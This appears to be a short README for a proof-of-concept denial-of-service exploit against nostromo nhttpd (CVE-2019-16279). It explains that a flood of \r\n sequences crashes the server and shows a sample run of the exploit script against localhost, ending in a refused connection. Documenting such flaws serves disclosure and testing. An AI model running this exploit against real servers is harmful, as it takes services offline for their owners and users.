Nostromo httpd CVE-2019-16279 – Denial of Service

Description

Directory Traversal in the function SSL_accept in nostromo nhttpd through 1.9.6 allows an attacker to trigger a denial of service via a crafted HTTP request.

This bug exploit a memory error when sending too many \r\n in a single connexion.

Example

$ curl http://127.0.0.1:8080
HELLO!
$ ./CVE-2019-16279.sh 127.0.0.1 8080
$ curl http://127.0.0.1:8080
curl: (7) Failed to connect to 127.0.0.1 port 8080: Connection refused